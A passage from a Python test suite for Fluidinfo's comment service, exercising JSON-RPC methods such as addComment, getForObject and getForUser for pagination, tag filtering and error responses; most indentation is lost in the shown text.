u'fluidinfo.com/info/timestamp': 1337170394.16253,
u'fluidinfo.com/info/url': (
u'https://fluidinfo.com/comment/'
'fluidinfo.com/username/2012-05-16T12:13:14.162530'),
u'fluidinfo.com/info/username': u'username'}},
result)
@inlineCallbacks
def testExplicitAboutValueIsTheFirstThingInTheCreatedAboutTag(self):
"""
When a comment is created with an explicit about value and about
values in the comment text, the explicit value must be the first
element in the resulting fluidinfo.com/info/about tag.
"""
result = yield self.invoke(
'addComment', about=u'explicit about',
text='#Fishing is cool.')
result = loads(result)
abouts = result['result']['fluidinfo.com/info/about']
self.assertEqual(abouts[0], u'explicit about')
# Make sure the list has more than just the explicit about value in
# it, so we know it's the first value among several (as opposed to
# being the first value simply because no other values were present
# in the comment text).
self.assertTrue(len(abouts) > 1)
@inlineCallbacks
def testAddCommentWithMalformedCreationTime(self):
"""
The C{addComment} method returns a C{BAD_REQUEST} error if the
specified creation time is malformed.
"""
result = yield self.invoke(
'addComment', about=u'trout fishing in america',
text='@joe @sam http://abc.com/def.html is #super #cool',
creationTime='malformed')
self.assertEqual(
{u'jsonrpc': u'2.0', u'id': 100,
u'error': {u'message': u'Creation time is malformed.',
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testAddCommentWithoutCommentText(self):
"""
The C{addComment} method returns a C{BAD_REQUEST} error if no comment
text is provided.
"""
result = yield self.invoke('addComment', about=u'about')
self.assertEqual(
{u'jsonrpc': u'2.0', u'id': 100,
u'error': {
u'message': u'Comment text non-existent or just whitespace.',
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testAddCommentWithEmptyCommentText(self):
"""
The C{addComment} method returns a C{BAD_REQUEST} error if the comment
text provided is empty.
"""
result = yield self.invoke('addComment', about=u'about')
self.assertEqual(
{u'jsonrpc': u'2.0', u'id': 100,
u'error': {
u'message': u'Comment text non-existent or just whitespace.',
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testAddCommentWithAnonymousUser(self):
"""
The C{addComment} method returns an C{UNAUTHORIZED} error if the
anonymous user attempts to create a comment.
"""
result = yield self.invoke('addComment', _username=u'anon',
about=u'about', text=u'text')
self.assertEqual({u'jsonrpc': u'2.0', u'id': 100,
u'error': {u'message': u'Access denied.',
u'code': UNAUTHORIZED}},
loads(result))
@inlineCallbacks
def testGetForObjectWithoutComments(self):
"""
The C{getForObject} method returns an empty C{list} if no comments are
available for the specified about value.
"""
result = yield self.invoke('getForObject', about=u'about')
self.assertEqual({'id': 100, 'jsonrpc': '2.0',
'result': {'nextPageID': None,
'currentPageID': None,
'comments': []}},
loads(result))
@inlineCallbacks
def testGetForObject(self):
"""
The C{getForObject} method returns the comments available for the
specified object, sorted from newest to eldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForObjectWithUsername(self):
"""
The C{getForObject} method returns the comments about the specified
object made by the specified user, sorted from newest to eldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username1', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username2', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
username=u'username1')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username1'}]},
result)
@inlineCallbacks
def testGetForObjectWithFollowedByUsername(self):
"""
The C{getForObject} method returns the comments about the specified
object made by the specified user's friends, sorted from newest to
eldest.
"""
[(objectID, _)] = UserAPI().create([
(u'friend', u'secret', u'Friend', u'friend@example.com')])
TagValueAPI(self.user).set({objectID: {u'username/follows': None}})
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'friend', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'foe', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
followedByUsername=u'username')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'friend'}]},
result)
@inlineCallbacks
def testGetForObjectWithFilterTags(self):
"""
The C{getForObject} method returns the comments about the specified
object made having the specified tags, sorted from newest to
eldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'friend', about=[u'about'],
when=time,
url='http://example.com/1')
comments.create(u'Comment 2', u'foe', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/2')
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com friend %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/tag': None}})
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
filterTags=[u'username/tag'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'friend'}]},
result)
@inlineCallbacks
def testGetForObjectWithfilterAbout(self):
"""
The C{getForObject} method returns the comments about the specified
object and also with the given object filter, sorted from newest to
eldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'friend', about=[u'about', u'+filter'],
when=time,
url='http://example.com/1')
comments.create(u'Comment 2', u'foe', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
filterAbout=u'+filter')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about', u'+filter'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'friend'}]},
result)
@inlineCallbacks
def testGetForObjectWithNextPageID(self):
"""
The C{getForObject} method uses the C{nextPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
nextPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForObjectWithCurrentPageID(self):
"""
The C{getForObject} method uses the C{currentPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
currentPageID=1336604400)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336690800.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336690800.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForObjectWithMalformedNextPageID(self):
"""
The C{getForObject} method raises an error if the C{nextPageID}
argument is not well formed.
"""
result = yield self.invoke('getForObject', about=u'about',
nextPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse nextPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForObjectWithMalformedCurrentPageID(self):
"""
The C{getForObject} method raises an error if the C{currentPageID}
argument is not well formed.
"""
result = yield self.invoke('getForObject', about=u'about',
currentPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse currentPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForObjectReturnsNextPageID(self):
"""
The C{getForObject} method returns a C{nextPageID} value when another
page of comments could be loaded.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
for i in range(26):
comments.create(u'Comment', u'username', about=[u'about'],
when=time - timedelta(minutes=i),
url='http://example.com/comment')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about')
result = loads(result)['result']
self.assertEqual(1336602960, result['nextPageID'])
self.assertEqual(25, len(result['comments']))
@inlineCallbacks
def testGetForObjectWithAdditionalTags(self):
"""
The C{getForObject} method invoked with a list of C{additionalTags}
returns those in addition to the default ones.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com username %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/custom': u'Honk'}})
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
additionalTags=[u'username/custom'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username',
u'username/custom': u'Honk'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForObjectWithAdditionalTagsEmptyList(self):
"""
The C{getForObject} method, if invoked with an empty C{additionalTags}
list acts the same as when none are specified.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
additionalTags=[])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForObjectWithAdditionalTagsInvalidPath(self):
"""
The C{getForObject} method raises an error if the C{additionalTags}
argument contains an invalid tag path.
"""
result = yield self.invoke('getForObject', about=u'about',
additionalTags=[u'///'])
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"u'///' is not a valid path for "
+ "additionalTags.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForObjectWithAdditionalTagsUnknownPath(self):
"""
The C{getForObject} method raises an error if the C{additionalTags}
argument contains an unknown tag path.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time, url='http://example.com/1')
self.store.commit()
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com username %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/custom': u'Honk'}})
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
additionalTags=[u'username/custom',
u'nosuchuser/unknowntag'])
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Unknown path in additionalTags: " +
u"'nosuchuser/unknowntag'.",
u'code': BAD_REQUEST}},
loads(result))
def testGetForObjectWithAdditionalTagsInvalidType(self):
"""
The C{getForObject} method raises an error if the C{additionalTags}
argument contains an invalid type in a tag path.
"""
result = yield self.invoke('getForObject', about=u'about',
additionalTags=[666])
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Invalid type in additionalTags.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testSummarizeObject(self):
"""
The C{summarizeObject} method returns summary information for the
comments about an object.
"""
comments = SecureCommentAPI(self.user)
comments.create(u'I drank #whisky with @ntoll and @terrycojones',
u'username', about=[u'about'])
self.store.commit()
result = yield self.invoke('summarizeObject', about=u'about')
result = loads(result)['result']
self.assertEqual({'commentCount': 1, 'followers': [],
'relatedObjects': {'#whisky': 1,
u'@ntoll': 1,
u'@terrycojones': 1}},
result)
@inlineCallbacks
def testSummarizeObjectWithEmptyAboutValue(self):
"""
The C{summarizeObject} method returns a C{BAD_REQUEST} error if the
specified about value is empty.
"""
result = yield self.invoke('summarizeObject', about=u'')
self.assertEqual({u'jsonrpc': u'2.0', u'id': 100,
u'error': {u'message': u'Need an about value.',
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testSummarizeObjectWithWhitespaceAboutValue(self):
"""
The C{summarizeObject} method returns a C{BAD_REQUEST} error if the
specified about value only contains whitespace.
"""
result = yield self.invoke('summarizeObject', about=u' \n')
self.assertEqual({u'jsonrpc': u'2.0', u'id': 100,
u'error': {u'message': u'Need an about value.',
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForUserWithoutComments(self):
"""
The C{getForUser} method returns an empty C{list} if no comments are
available for the specified about value.
"""
result = yield self.invoke('getForUser', username=u'username')
self.assertEqual({'id': 100, 'jsonrpc': '2.0',
'result': {'nextPageID': None,
'currentPageID': None,
'comments': []}},
loads(result))
@inlineCallbacks
def testGetForUser(self):
"""
The C{getForUser} method returns the comments available from the
specified user, sorted from newest to oldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForUser', username=u'username')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithNextPageID(self):
"""
The C{getForUser} method uses the C{nextPageID} to return the correct
page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForUser', username='username',
nextPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithCurrentPageID(self):
"""
The C{getForUser} method uses the C{currentPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
# Re-fetching with currentPageID=t returns only 'Comment 1' (one day
# newer than t) and reports its timestamp as the new currentPageID.
result = yield self.invoke('getForUser', username='username',
currentPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336690800.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336690800.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithFilterTags(self):
"""
The C{getForUser} method invoked with a list of C{filterTags}
returns only comments with the filtered tags present.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
comments.create(u'Comment 3', u'username', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/3')
# Tags are attached to the comment objects by recreating each
# comment's about value ('fluidinfo.com <username> <ISO timestamp>')
# to look up its object ID.
# Comment 1 gets only username/tag1
commentAbout1 = u'fluidinfo.com username %s' \
% (time - timedelta(days=1)).isoformat()
commentID1 = ObjectAPI(self.user).create(commentAbout1)
TagValueAPI(self.user).set({commentID1: {u'username/tag1': u'Monkey'}})
# Comment 2 gets both username/tag1 and username/tag2
commentAbout2 = u'fluidinfo.com username %s' % time.isoformat()
commentID2 = ObjectAPI(self.user).create(commentAbout2)
TagValueAPI(self.user).set({commentID2: {u'username/tag1': u'Monkey',
u'username/tag2': u'Ape'}})
self.store.commit()
# Comment 3 has no tags at all.
# Only Comment 2 carries both filter tags, so it alone is returned.
result = yield self.invoke('getForUser', username=u'username',
filterTags=[u'username/tag1',
u'username/tag2'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithFilterTagsAndAdditionalTags(self):
"""
The C{getForUser} method invoked with a list of C{filterTags}
returns only comments with the filtered tags present and the values of
any tags specified in C{additionalTags}.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com username %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/tag': u'Monkey'}})
self.store.commit()
# Only Comment 2 has username/tag; since the same path is also in
# additionalTags, its value appears inline in the returned comment.
result = yield self.invoke('getForUser', username=u'username',
filterTags=[u'username/tag'],
additionalTags=[u'username/tag'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username',
u'username/tag': u'Monkey'}]},
result)
@inlineCallbacks
def testGetForUserWithfilterAbout(self):
"""
The C{getForUser} method returns the comments for the specified
user and also with the given object filter, sorted from newest to
oldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
# Only Comment 1 mentions the '+filter' about value.
comments.create(u'Comment 1', u'username',
about=[u'about', u'+filter'],
when=time,
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForUser', username='username',
filterAbout='+filter')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about', u'+filter'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithMalformedNextPageID(self):
"""
The C{getForUser} method raises an error if the C{nextPageID} argument
is not well formed.
"""
# A non-numeric page ID must yield a JSON-RPC error response with a
# BAD_REQUEST code rather than a result.
result = yield self.invoke('getForUser', username='username',
nextPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse nextPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForUserWithMalformedCurrentPageID(self):
"""
The C{getForUser} method raises an error if the C{currentPageID}
argument is not well formed.
"""
# A non-numeric page ID must yield a JSON-RPC error response with a
# BAD_REQUEST code rather than a result.
result = yield self.invoke('getForUser', username='username',
currentPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse currentPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForUserReturnsNextPageID(self):
"""
The C{getForUser} method returns a C{nextPageID} value when another
page of comments could be loaded.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
# 26 comments, one per minute going back in time; one more than fits
# on a single 25-comment page.
for i in range(26):
comments.create(u'Comment', u'username', about=[u'about'],
when=time - timedelta(minutes=i),
url='http://example.com/comment')
self.store.commit()
result = yield self.invoke('getForUser', username='username')
result = loads(result)['result']
# nextPageID is the timestamp of the oldest comment on the returned
# page: time - 24 minutes == 1336602960.
self.assertEqual(1336602960, result['nextPageID'])
self.assertEqual(25, len(result['comments']))
@inlineCallbacks
def testGetForUserWithAdditionalTags(self):
"""
The C{getForUser} method invoked with a list of C{additionalTags}
returns those in addition to the default ones.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com username %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/custom': u'Honk'}})
self.store.commit()
result = yield self.invoke('getForUser', username=u'username',
additionalTags=[u'username/custom'])
result = loads(result)['result']
# Both comments come back; only Comment 2 (which carries the tag)
# includes the extra 'username/custom' value.
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username',
u'username/custom': u'Honk'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithAdditionalTagsEmptyList(self):
"""
The C{getForUser} method, if invoked with an empty C{additionalTags}
list acts the same as when none are specified.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
# additionalTags=[] must behave like omitting the argument: only the
# default fluidinfo.com/info/* fields are returned.
result = yield self.invoke('getForUser', username=u'username',
additionalTags=[])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithAdditionalTagsInvalidPath(self):
"""
The C{getForUser} method raises an error if the C{additionalTags}
argument contains an invalid tag path.
"""
# u'///' is not a valid Fluidinfo tag path; expect a BAD_REQUEST
# JSON-RPC error (note the error message embeds the repr, u'///').
result = yield self.invoke('getForUser', username=u'username',
additionalTags=[u'///'])
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"u'///' is not a valid path for "
+ "additionalTags.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForUserWithAdditionalTagsInvalidType(self):
    """
    The C{getForUser} method raises an error if the C{additionalTags}
    argument contains an invalid type in a tag path.
    """
    # BUG FIX: the body uses 'yield', but the method was missing the
    # @inlineCallbacks decorator that every sibling test has.  Without it
    # the method returned an unconsumed generator, so the request was
    # never made and the assertions never ran.
    result = yield self.invoke('getForUser', username=u'username',
                               additionalTags=[666])
    self.assertEqual({u'jsonrpc': u'2.0',
                      u'id': 100,
                      u'error': {
                          u'message': u"Invalid type in additionalTags.",
                          u'code': BAD_REQUEST}},
                     loads(result))
@inlineCallbacks
def testGetAllFollowedWithoutComments(self):
"""
The C{getAllFollowed} method returns an empty C{list} if no comments
are available for the specified user.
"""
# With no followed objects and no comments, both page IDs are None.
result = yield self.invoke('getAllFollowed', username=u'username')
self.assertEqual({'id': 100, 'jsonrpc': '2.0',
'result': {'nextPageID': None,
'currentPageID': None,
'comments': []}},
loads(result))
@inlineCallbacks
def testGetRecent(self):
"""The C{getRecent} method returns recent comments."""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getRecent')
result = loads(result)['result']
# Comments are returned newest first; currentPageID is the newest
# comment's timestamp.
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 2'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetRecentWithNextPageID(self):
"""
The C{getRecent} method uses the C{nextPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
self.store.commit()
